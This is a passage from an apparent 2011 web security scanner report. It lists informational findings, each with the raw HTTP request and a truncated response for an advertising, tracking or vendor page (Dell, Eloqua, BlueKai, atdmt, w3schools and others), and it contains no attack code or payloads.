...[SNIP]...

25.10. http://i.dell.com/tlFramePage.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.dell.com
Path:   /tlFramePage.htm

Request

GET /tlFramePage.htm HTTP/1.1
Host: i.dell.com
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network; cid=64824; lid=1652027; dgc=ST; st=application%20security%20web; acd=s1CStlI5S%2C13885348293%2C901qz26673; e21=us-bsd%3A1317745155344; s_depth=1; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%5D; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A19%7C%7CN%7C%7CN%7C%7Cnull%7C%7Cundefined%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull; s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457

Response

HTTP/1.1 200 OK
Content-Length: 171
Content-Type: text/html
Last-Modified: Mon, 02 May 2011 08:59:28 GMT
Accept-Ranges: bytes
ETag: "05853ea78cc1:0"
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 16:19:15 GMT
Connection: close

<HTML>
<Head>
<script language="JavaScript" src="/images/global/js/tlSubDomainSDK.js" type="text/JavaScript"></script>
</Head>
<Body>
tl iframe src
</Body>
</HTML>

25.11. http://msite.martiniadnetwork.com/index/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msite.martiniadnetwork.com
Path:   /index/

Request

GET /index/?pid=1811702&sid=7696162854db74d954e7c2&loc=http%3A%2F%2Fwww.wallstreetoasis.com%2Fforums%2Fhoulihan-lokey-exit-opps&rnd=277040346&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey HTTP/1.1
Host: msite.martiniadnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MMNBASEID=21051315103139790868608; OptOut=no; MMNBASEVAL=dg1OGlDFQEGBWEfS7tLtvB2icx%2F43QwcZuByc7hC%2FFwpNwg2dcJs16mi0QkZqrufiuALx2jw6cCPE5uyZkG3w6gti9rk94qf4YBDg56Zb3DJpkERIlu9gyMTqr%2B1qet31h2TMOLXTWLXAEmslILn8GHESyuOt3NUKYvzzw%3D%3D; MMNATTR=IFEW09kJhL%2B4vn52PCYvaTZbe3g92AUd3icRwb8wT0yGEyQ%2FHCSgkxR0S3axnH8iWB6cSzqhcPm%2B8%2Flckb%2B%2BvtS5UUl3AroG8T%2B%2BMFT%2FyHfvAKlQxDC%2B9x0Q%2BpPydeyGBra3LWkVCZo4aOrGwRyVEw16t%2B006q%2BGQp%2Bg0goHUldyWQYRF839l7TaJ%2FrhAHCUPIoAyWZbaTrEF5JnWto%2FoNmkqAAt4n%2Fm4Hd72GSULxEvvWc3h00v4MuQG%2BKJLjiwWF8nQ5YwfNQhp%2BBc%2B9rSQN2KBZ0f%2FK7eFXxuTawHOWNHHcD7XK9F28ZqHNopTljY0R6t5chCPG5b2LlEvD1gN69o2yc6eBEZgllBkIOBANJtUlaCVa7EDc2iWO3ESSzdaDIdKANoLgTP

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: MMNBASEID=21051315103139790868608; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: OptOut=no; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNBASEVAL=YWD1YmbiWuz7AsS1KVDCF1c5o35KnXdvno5Z0INmj%2F7CpqYepUldLb83WGMbDyg5ReCkbk08Zfg0TU0h%2BMdG5TrOM4XB%2FsDXXBqQGzGd3YSyniLCBefwGVsHiaM4wxoMFMIAI8Y04HfESuUDejuH3kHgzqk94%2BQxrR9q2jXy%2BU3GYjo%3D; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNATTR=6pmOZDgtbdXFinvYjnkU10%2FCFThr2pTrkPV0IFbkxoUqTm%2BeAeoBnMC7S4NEVKOWoSpzXeOpE%2BjqrbypMl26KHbbr4%2ByR3YHOlWnPiLWKF91w7kXIcGu27%2F1gfrdQuiM81WwHxYm7B0CQz7i4ZlTtGBJHpa%2FhwhBtezlcJdSVMHhNuRCORFXN407RbsVUJzBVK4SxxDG5Iyy4GAF6hdooaCjrHfn2AL4B%2FIofXGGTj7K0PSVqYo2xlVsiMzwDE3kwDlR5yLTdb1M8%2F%2FY8wHAsLIYV6%2BNxun7AVMtlDBPo7belPN%2BFOUYfWQpY0DQJVALHnjc6qYeO5PKMCYsXrKPrUX3D0Gt7wGvkn25zJuPwoU4XjlCJMV5QsOKQwY1MJhqv1LUcd7xCLjE; expires=Fri, 02-Mar-2012 16:17:06 GMT; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSID=90315e9a956304f81bb261d08197857d; path=/; domain=.martiniadnetwork.com; httponly
Set-Cookie: MMNSESSIDC=1; path=/; domain=.martiniadnetwork.com; httponly
Cache-Control: max-age=15552000
Expires: Fri, 02 Mar 2012 16:17:06 GMT
Vary: Accept-Encoding
Content-Length: 1288
Content-Type: text/html


var OAS_taxonomy = 'muid=21051315103139790868608';
var OAS_pubclick = 'http://msite.martiniadnetwork.com/action/track/type/0/pid/1811702/sid/7696162854db74d954e7c2/loc/http%3A%2F%2Fwww.wallstreetoa
...[SNIP]...

25.12. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=466&ref2=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan+Lokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf+web+application+security%26pbx%3D1%26oq%3Dwaf+web+application+security%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&tzo=360&ms=828 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.imperva.com/products/wsc_web-application-firewall.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 16:18:32 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

25.13. http://samples.msdn.microsoft.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://samples.msdn.microsoft.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: samples.msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_NVR=0=/:1=en-us:2=en-us/library|en-us/evalcenter|en-us/security; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; TOptOut=1; ADS=SN=175A21EF; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; s_cc=true; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315178628206:ss=1315178628206; s_sq=msstomsdn%2Cmsstomsdnonly%2Cmsstomsdnmktenus%2Cmsstolibrollup%2Cmsstolibwebdev%2Cmsstouberie%3D%2526pid%253Dmsdn%25253A/en-us/library/ms533897%2526pidt%253D1%2526oid%253Dhttp%25253A//samples.msdn.microsoft.com/workshop/samples/author/dhtml/refs/insertScript_2.htm%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:29:37 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

25.14. http://tags.bluekai.com/site/4234  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4234

Request

GET /site/4234?ret=html&limit=15&r=32611&phint=v30%3Dgw%3A%20us%2Fen%3A%20search%3A%20query%20page&phint=v16%3Dother&phint=v24%3Dany&phint=v26%3Dus&phint=v08%3DSearch%20HP.com%20United%20States&phint=v29%3Dany&phint=v31%3DSearch%20HP%20US%20-%20Search%20results%20for%20'xss'&phint=v32%3Dhttp%3A%2F%2Fsearch.hp.com%2Fquery.html%3Flang%3Den%26qp%3D%26search%3D%26qt%3Dxss%26la%3Den%26hps%3DHome%26hpr%3Dhttp%253A%2F%2Fh41131.www4.hp.com%2Fus%2Fen%26charset%3Dutf-8%26cc%3Dus%26hpn%3DHome%26hpa%3Dhttp%253A%2F%2Fwww.hp.com%2Fcountry%2Fus%2Fen%2Fcontact_us.html HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://search.hp.com/query.html?lang=en&qp=&search=&qt=xss&la=en&hps=Home&hpr=http%3A//h41131.www4.hp.com/us/en&charset=utf-8&cc=us&hpn=Home&hpa=http%3A//www.hp.com/country/us/en/contact_us.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkdc=sf; BKIgnore=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:48 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
BK-Server: a094
Content-Length: 40
Content-Type: text/html

<html><head></head><body></body></html>

25.15. http://trk.etrigue.com/track.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.etrigue.com
Path:   /track.php

Request

GET /track.php?ie=1&a1017=&b1017=&a1017exit=&a=1017&c=8&callback=etrigue1315153232083 HTTP/1.1
Host: trk.etrigue.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:19:52 GMT
Content-Length: 26

etrigue1315153232083=null;

25.16. http://trk.roitrax.com/radware/rts.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.roitrax.com
Path:   /radware/rts.html

Request

GET /radware/rts.html?tver=4&cid=3091&rts_id=261&cf=source&ccf=ccat&dh=www.radware.com&dp=/Resources/AppWallSolution.aspx&ds=%3Fsource%3Dgoogle%269gtype%3Dsearch%269gkw%3Dweb%2520application%2520security%269gad%3D8494610116.1%269gpla%3D%269gag%3D2157798556%26gclid%3DCLjykYz_g6sCFQwaQgodAQy8yw&dr=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&rp=http&ts=1315153146509&af=afid&kf=kfid&lf=lfid HTTP/1.1
Host: trk.roitrax.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/Resources/AppWallSolution.aspx?source=google&9gtype=search&9gkw=web%20application%20security&9gad=8494610116.1&9gpla=&9gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:02 GMT
Server: Apache/2.0.53 (Unix) mod_ssl/2.0.53 OpenSSL/0.9.7g
Last-Modified: Tue, 30 Aug 2011 18:30:13 GMT
ETag: "52fe-1936-33cbb740"
Accept-Ranges: bytes
Content-Length: 6454
P3P: CP="NOI DSP COR NID DEVa OUR IND COM NAV"
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>roitrax</title> </head> <body> <script type="text/javascript"> var _={W:wind
...[SNIP]...

25.17. http://view.atdmt.com/CNT/iview/334305255/direct/01  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /CNT/iview/334305255/direct/01

Request

GET /CNT/iview/334305255/direct/01?click=http://clk.specificclick.net/click/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;dct=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Mon, 05 Sep 2011 02:30:53 GMT
Connection: close
Content-Length: 8688

<html><head><title>ATT_NoImage_70_Number_728x90</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...

25.18. http://view.atdmt.com/I36/iview/325171692/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /I36/iview/325171692/direct

Request

GET /I36/iview/325171692/direct;wi.300;hi.250/01/775562240?click=http://oasc18015.247realmedia.com/RealMedia/ads/click_lx.ads/www.wallstreetoasis.rgm/paid/L28/775562240/Right/RGM/RGM-2618_CapitalOne_300x250_GeoKansas_0828-0917/RGM-2618_CapitalOne_300x250_GeoKansas_0717-0806_070911.html/4d686437616b356934616b41434d6658? HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; TOptOut=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 16:17:02 GMT
Connection: close
Content-Length: 7465

<html><head><title>20110801_CC_Endorser_UT_V2_300_250_FL</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width
...[SNIP]...

25.19. http://www.demosondemand.com/shared_components/javascript/launchDemoStage3PlayerClient_js.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.demosondemand.com
Path:   /shared_components/javascript/launchDemoStage3PlayerClient_js.asp

Request

GET /shared_components/javascript/launchDemoStage3PlayerClient_js.asp HTTP/1.1
Host: www.demosondemand.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:18:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1655
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCBRACDB=MDAFPIDBCNGIHBMKEPNKOOLA; path=/
Cache-control: private


function launchDemoStage3Player(session_id, promotion_id,startTime,reseller_id )
{
       var initialW = 250;
var initialH = 200;
var x = (screen.width/2)-initialW/2;
var y
...[SNIP]...

25.20. http://www.vodburner.com/affland.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vodburner.com
Path:   /affland.php

Request

GET /affland.php?aff_id=A18 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://shop.skype.com/apps/Call-recording-audio-video/VodBurner-Video-Call-Recorder.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.vodburner.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: aff_id=A18; expires=Wed, 01-Sep-2021 21:09:12 GMT; path=/; domain=.vodburner.com
Content-Length: 333
Connection: close
Content-Type: text/html

<html>
<head>
   <title>VodBurner Download</title>
</head>
<link rel="stylesheet" href="http://www.vodburner.com/wp-content/themes/vina-new/style.css" type="text/css" media="screen" />

<body>

<script
...[SNIP]...

25.21. http://www.w3schools.com/banners/aspallbannerframe.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /banners/aspallbannerframe.asp

Request

GET /banners/aspallbannerframe.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/dom_obj_base.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.22.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 496
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:34:22 GMT
Cache-control: private


<html>
<head>
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="cache-control" content="no-cache" />
</head>
<body style="background-color:#ffffff;margin:0;padding:0;">
<div cl
...[SNIP]...

25.22. http://www.w3schools.com/banners/aspallframe.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /banners/aspallframe.asp

Request

GET /banners/aspallframe.asp HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/dom_obj_base.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.22.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:20 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 745
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:34:20 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="pragma" content="no-cache" />
<meta http
...[SNIP]...

25.23. http://www.w3schools.com/js/tryit.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /js/tryit.asp

Request

GET /js/tryit.asp?filename=tryjs_text HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/js_ex_dom.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
